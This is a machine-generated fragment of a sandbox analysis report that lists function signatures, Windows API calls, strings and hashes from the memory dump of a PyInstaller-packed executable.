                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6485ef080591767760fe67f9caec812fff4e1ba5c20858478bd9f0fbec74de2f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5412B371E0C263E6FB24BA15E04467976ABFB40750F944136E79A87BC4DF7CE9908B08
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                            • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                            • Opcode ID: 47a7a6303f50c331757a7ed503f6ccc132970c05c2223996d06c8e5714df85c4
                                                                                                                                                                                                                                                            • Instruction ID: 82c57626d964c7d9075061fb34f581e1ae40eef3a7784c578c79fdee3959bacb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47a7a6303f50c331757a7ed503f6ccc132970c05c2223996d06c8e5714df85c4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35128F62E0C163E6FB24BA54E0546BA729BFBD0754F884132E799C67C4DF7CE8908B50
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                                                            • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                            • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                                                            • Opcode ID: 9095cb27183a8615287c63e08b54de828af981adc91def897024e347138b7828
                                                                                                                                                                                                                                                            • Instruction ID: 9dfc91e0b643ff0b8b8168621ef1689b97bd1324d605cd508c8a7474870964f6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9095cb27183a8615287c63e08b54de828af981adc91def897024e347138b7828
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BA419231B4C663E2FA24FB12A9406BAA391FF89BC4F444431DE5D87BA5DE3CE5458380
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
• String ID: CreateProcessW$Failed to create child process!
• API String ID: 2895956056-699529898
• Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
• Instruction ID: 47de76dc5fa4126ef7c5004b4db62545672ab9370504d5136caecccf2e9b28ea
• Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
• Instruction Fuzzy Hash: EF41FB31A1CB9291EA20BB64E4952AEB2A5FB89364F500335E6AD877D9DF7CD0448B40
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: e61afc8d21ba52cdbe611d77afa9c967b031d652e012678c684f0478f5a183c7
• Instruction ID: b7835b3a952e6b23f43904783f28ca2b998240ee58df873890d39408928fee2c
• Opcode Fuzzy Hash: e61afc8d21ba52cdbe611d77afa9c967b031d652e012678c684f0478f5a183c7
• Instruction Fuzzy Hash: 2ED14C32A0CB61DAEB20FB6594403AD77A0FB55798F104235EE8D97B96DF38E581C780
APIs
• FreeLibrary.KERNEL32(?,?,?,00007FF6404FE3BA,?,?,-00000018,00007FF6404FA063,?,?,?,00007FF6404F9F5A,?,?,?,00007FF6404F524E), ref: 00007FF6404FE19C
• GetProcAddress.KERNEL32(?,?,?,00007FF6404FE3BA,?,?,-00000018,00007FF6404FA063,?,?,?,00007FF6404F9F5A,?,?,?,00007FF6404F524E), ref: 00007FF6404FE1A8
Strings
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
• Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
• Instruction ID: b6910443d84c49c151f59c00ef2200bc76ce80b2dbad949d85a3e33c553a0d70
• Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
• Instruction Fuzzy Hash: A141E231B1DA22E1FA16FB17AA0467A229BFF45B90F084535DD1DC7784EE3CEA458300
APIs
• GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF6404E3834), ref: 00007FF6404E7CE4
• CreateDirectoryW.KERNEL32(?,?,FFFFFFFF,00007FF6404E3834), ref: 00007FF6404E7D2C
  • Part of subcall function 00007FF6404E7E10: GetEnvironmentVariableW.KERNEL32(00007FF6404E365F), ref: 00007FF6404E7E47
  • Part of subcall function 00007FF6404E7E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6404E7E69
  • Part of subcall function 00007FF6404F7548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6404F7561
  • Part of subcall function 00007FF6404E26C0: MessageBoxW.USER32 ref: 00007FF6404E2736
Strings
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
• String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
• API String ID: 740614611-1339014028
• Opcode ID: 9cba264b996c54071923a246639d1af5409d9d1b2208d63368212f3f3054f6c1
• Instruction ID: 05379c9ae0fcb58b5ad99494fa2f29691be71f51bb853eeff872209563e4896b
• Opcode Fuzzy Hash: 9cba264b996c54071923a246639d1af5409d9d1b2208d63368212f3f3054f6c1
• Instruction Fuzzy Hash: 00419121A0D662E0FA24FB619A55AFA2255EF957D4F405131EE1DC7796EE3CE5008380
APIs
• LoadLibraryExW.KERNEL32(?,?,?,00007FF6404ED29A,?,?,?,00007FF6404ECF8C,?,?,?,00007FF6404ECB89), ref: 00007FF6404ED06D
• GetLastError.KERNEL32(?,?,?,00007FF6404ED29A,?,?,?,00007FF6404ECF8C,?,?,?,00007FF6404ECB89), ref: 00007FF6404ED07B
• LoadLibraryExW.KERNEL32(?,?,?,00007FF6404ED29A,?,?,?,00007FF6404ECF8C,?,?,?,00007FF6404ECB89), ref: 00007FF6404ED0A5
• FreeLibrary.KERNEL32(?,?,?,00007FF6404ED29A,?,?,?,00007FF6404ECF8C,?,?,?,00007FF6404ECB89), ref: 00007FF6404ED113
• GetProcAddress.KERNEL32(?,?,?,00007FF6404ED29A,?,?,?,00007FF6404ECF8C,?,?,?,00007FF6404ECB89), ref: 00007FF6404ED11F
Strings
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
• Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
• Instruction ID: 0a577c0a8e8f3bba22f2a6c7fa658903c5fe1a473d615a13009d932257db2ec8
• Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
• Instruction Fuzzy Hash: B131C221A1EA62E1EE15FB12A9006797394FF49BA8F5E4635DD2D87380EF3CE4468340
APIs
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
• String ID:
                                                                                                                                                                                                                                                            • API String ID: 995526605-0
                                                                                                                                                                                                                                                            • Opcode ID: cb4766db9d01b9dd8e968687fe92956989c3d0e6154c1ea64db8f8bdde092e2e
                                                                                                                                                                                                                                                            • Instruction ID: ac2e215d320ffff1b355f9a19b0d4e3315f0727fb6e3c8e833f686094dd3892a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb4766db9d01b9dd8e968687fe92956989c3d0e6154c1ea64db8f8bdde092e2e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0221A031A0CA5292EB20FB55E58462AB3A5EF917F4F200235EA7C83BE4DF7CD4858740
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                                                                            • Opcode ID: 4f1009f36f4b7e41e642a617816a0843c7a4fdcae41be86a1245b23186b7dd2e
                                                                                                                                                                                                                                                            • Instruction ID: 77a884a90357f97bee4cac1bb6da1c9681f41745507edee62d68497be7733232
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f1009f36f4b7e41e642a617816a0843c7a4fdcae41be86a1245b23186b7dd2e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 30219D24F4C662F2FA68B722564917D218BAF887B0F044734E83ECBBD6DE6CB4108701
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message$ErrorFormatLast
                                                                                                                                                                                                                                                            • String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
                                                                                                                                                                                                                                                            • API String ID: 3971115935-1149178304
                                                                                                                                                                                                                                                            • Opcode ID: 7223b30dd23a30c2aa7faf0092ff60e4697deebee1b944f1837b883079aee3ab
                                                                                                                                                                                                                                                            • Instruction ID: 254e0af54bfeede140830f3e6c79a011187cf6447a103088df4033657765c7e9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7223b30dd23a30c2aa7faf0092ff60e4697deebee1b944f1837b883079aee3ab
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B21517260CAA192F724FB10F5506DA7364FB89788F400136EADD93B98DF7CD5468B40
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                            • String ID: CONOUT$
                                                                                                                                                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                            • Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                                                                                                                                                                            • Instruction ID: eed7c7beb8184f8e67058d578fdfd354db35fab34eed7f0e391e23ce50bf447a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E5118E31A1CA6696F754BB02E99472A66A0FB89BE8F040234EA2DC7794DF3CD814C740
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00007FF6404E39F2), ref: 00007FF6404E821D
                                                                                                                                                                                                                                                            • K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF6404E39F2), ref: 00007FF6404E827A
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6404E3FA4,00000000,00007FF6404E1925), ref: 00007FF6404E86E9
                                                                                                                                                                                                                                                            • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF6404E39F2), ref: 00007FF6404E8305
                                                                                                                                                                                                                                                            • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF6404E39F2), ref: 00007FF6404E8364
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,00000000,?,00007FF6404E39F2), ref: 00007FF6404E8375
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,00000000,?,00007FF6404E39F2), ref: 00007FF6404E838A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3462794448-0
                                                                                                                                                                                                                                                            • Opcode ID: a6a3fb36dedf01dc407d01068d21ba79f730b9d247533213ec4f70efe0ab8627
                                                                                                                                                                                                                                                            • Instruction ID: 034fac8dac3773cf40ee69d2dac4f5db937848fbfd48adeca7cb6d57e4ecc282
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a6a3fb36dedf01dc407d01068d21ba79f730b9d247533213ec4f70efe0ab8627
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0419272A1DA92D1EA30FB11A5402BA6394FF89BD4F444139DF5D97789DE3CE401C780
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E7B50: GetCurrentProcess.KERNEL32 ref: 00007FF6404E7B70
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E7B50: OpenProcessToken.ADVAPI32 ref: 00007FF6404E7B83
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E7B50: GetTokenInformation.ADVAPI32 ref: 00007FF6404E7BA8
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E7B50: GetLastError.KERNEL32 ref: 00007FF6404E7BB2
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E7B50: GetTokenInformation.ADVAPI32 ref: 00007FF6404E7BF2
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E7B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6404E7C0E
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E7B50: CloseHandle.KERNEL32 ref: 00007FF6404E7C26
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,00007FF6404E3814), ref: 00007FF6404E848C
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,00007FF6404E3814), ref: 00007FF6404E8495
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                            • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                                            • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                                            • Opcode ID: 795f95526d0a951be163d7ee57e77295e71c5006ab84a191c0455a0dace466c7
                                                                                                                                                                                                                                                            • Instruction ID: 2d982544cdd8630cc35464163c093093a424154aa6d2a0564f51409ab334d1d6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 795f95526d0a951be163d7ee57e77295e71c5006ab84a191c0455a0dace466c7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 42215131A0C762E1FA54FB10E6153EA62A5FF89780F444035EA5D83796DF3CE944C790
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6404F43FD,?,?,?,?,00007FF6404F979A,?,?,?,?,00007FF6404F649F), ref: 00007FF6404FA5E7
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6404F43FD,?,?,?,?,00007FF6404F979A,?,?,?,?,00007FF6404F649F), ref: 00007FF6404FA61D
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6404F43FD,?,?,?,?,00007FF6404F979A,?,?,?,?,00007FF6404F649F), ref: 00007FF6404FA64A
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6404F43FD,?,?,?,?,00007FF6404F979A,?,?,?,?,00007FF6404F649F), ref: 00007FF6404FA65B
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6404F43FD,?,?,?,?,00007FF6404F979A,?,?,?,?,00007FF6404F649F), ref: 00007FF6404FA66C
                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00007FF6404F43FD,?,?,?,?,00007FF6404F979A,?,?,?,?,00007FF6404F649F), ref: 00007FF6404FA687
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2506987500-0
